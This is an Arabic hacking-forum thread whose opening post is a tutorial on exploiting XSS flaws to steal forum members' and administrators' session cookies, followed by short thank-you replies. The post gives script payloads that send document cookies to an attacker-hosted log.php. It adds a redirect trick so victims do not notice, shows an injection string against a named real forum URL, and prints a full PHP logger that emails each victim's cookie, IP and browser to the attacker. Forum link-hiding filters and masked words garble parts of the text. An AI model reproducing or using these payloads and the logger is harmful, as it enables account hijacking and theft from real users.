بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق


صفحة 1 من 37 12311 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 368

الموضوع: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

  1. #1

    aljyyosh بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    السلام عليكم ورحمه الله وبركاته ,,

    الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
    xss

    طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss

    هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
    كود PHP:
    <Script>javascript:alert(document.******)</Script>

    الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
    1- رقم العضويه
    2- الباسورد مشفر md5
    3 - الباسورد مشفر Hash

    ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

    طيب الحين وجدت هذا الكود سوف نربطه باللوج

    ماهو اللوج ؟
    اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

    طيب الان بعد ما ربطته اصبح الرابط :
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

    تمام الان :
    عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
    log.php = اسم ملف اللوج
    طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
    عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك

    المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
    كود PHP:
    <Script>javascript:alert(document.******)</Script>

    بـ
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

    الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

    بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

    طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

    بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

    مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

    بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
    re=www.google.com&
    بس
    بحيث يكون بعد & يوجد id ... الخ
    يعني يكون الكود :
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

    طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

    طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

    بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

    الكود للثغره :
    عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
    احنا راح نستبدل :
    كود PHP:
    <Script>javascript:alert(document.******)</Script>

    بـ
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

    واستبدل هنا موقع جوجل باي موقع تبغاه

    ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك

    ====================
    تطبيق :

    التطبيق هنا :
    كود PHP:
    http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.***** *) </script>

    ===================
    اللوج :
    كود PHP:
    <?php
    // Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
    //----- S4a Logger v0.10 -----//
    // Star
    //Your Email --::--
    $ToGet = "[email protected]";
    ////////////////////////////////
    $Ip = $REMOTE_ADDR;
    $Sys = $HTTP_USER_AGENT;
    //////////////////////////////////////////////
    if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
    //
    $Time = date("l dS of F Y h:i:s A");

    $Hdr = 'From: Logger <logger@secourty>';

    $Msg = '
    Hi ,, Mr.Attacker :D
    -------------------------------------------
    - Thnx For S4a ,, Security For Arab Forum -
    - s4a -
    - s4a froum -
    ---------------------------------------------------------------------
    - This Script Coded By Devil-00 [ Devil From Palestine ] -
    - <[email protected]><[email protected]><devil0f0p@ya hoo.com> -
    ---------------------------------------------------------------------
    - IP ::- [ '
    .$Ip.' ]
    - System ::- [ '
    .$Sys.' ]
    - The ****** ::- [ '
    .$id.' ]
    - Time ::- [ '
    .$Time.' ]
    ---------------------------------------------------------------------
    - root@devil00 ~ ./evilcat /etc/passwd -
    - root@devil00 ~ ./s4acracker passwd --log <log.log> && -
    ---------------------------------------------------------------------
    '
    ;
    $send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
    //
    /* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
    if(isset($_GET["re"])){
    $&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
    if(
    $&@#&@#&@#&@#&@#&@#&@# == ""){
    mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
    }else{
    header("location:".$&@#&@#&@#&@#&@#&@#&@#);
    }
    }
    //
    ?>

    استبدل هنا :
    كود PHP:
    $ToGet = "[email protected]";

    الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
    بالايميل تبعك !

    واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير ا
    ع التطبيق الا لانه درس عملي فقط لا أكثر ..

    وبإمكانك استغلاله بثغره xss تبع cPanel
    وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss



  2. #2

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    شرح جميل مشكور

    - - - تم التحديث - - -

    شرح جميل و بسيط مشكور

  3. #3

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكوووووووووووووووور

  4. #4

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    merciiiiiiiiiiiiiiiiiiiiiii

  5. #5

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    goooooooooooooooooood

  6. #6

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكور ويعطيك ألف عافيه

    - - - تم التحديث - - -

    .. تسلم اناملك على المجهود الرائع ..
    لاهنت ويعطيك الف عافيه

  7. #7

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكوووووووووووووووور

  8. #8

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكوووووووووووووووور

  9. #9

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    شكرا لك يا أخي على المجهود

  10. #10

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    بارك الله فيك اخي
    علمتني الحياة
    أن،، اودع من أحب،، في صمت
    وعلمتني الصمت ساعة الغضب
    وعلمتني أحذر من صديقي أكثر من عدوي
    وعلمتني أن السفر الطويل يعلم الصبر ولكن لا ينسي الغدر
    وعلمتني أن الفشل دائما هو بداية كل نجاح
    وعلمتني أخيراً أن الحياة والموت متشابهان
    فأنت لا تعلم متى تحيا .. و متى تموت؟؟

صفحة 1 من 37 12311 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. بعد غياب طويل .. ..
    بواسطة noureno-rca في المنتدى المنتدى العام
    مشاركات: 5
    آخر مشاركة: 01-14-2013, 01:48 AM
  2. بعد غياب طويل اختراق بعض المواقع اهداء الى وحوش الجيووش
    بواسطة pSyCh0_3D في المنتدى معرض الانجازات
    مشاركات: 32
    آخر مشاركة: 10-11-2011, 02:56 PM
  3. أجمل أندكس في العالم بعد غياب طويل
    بواسطة zaina في المنتدى قسم إندكسات الإختراق
    مشاركات: 5
    آخر مشاركة: 02-07-2011, 03:18 AM
  4. مشاركات: 12
    آخر مشاركة: 01-05-2011, 09:58 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •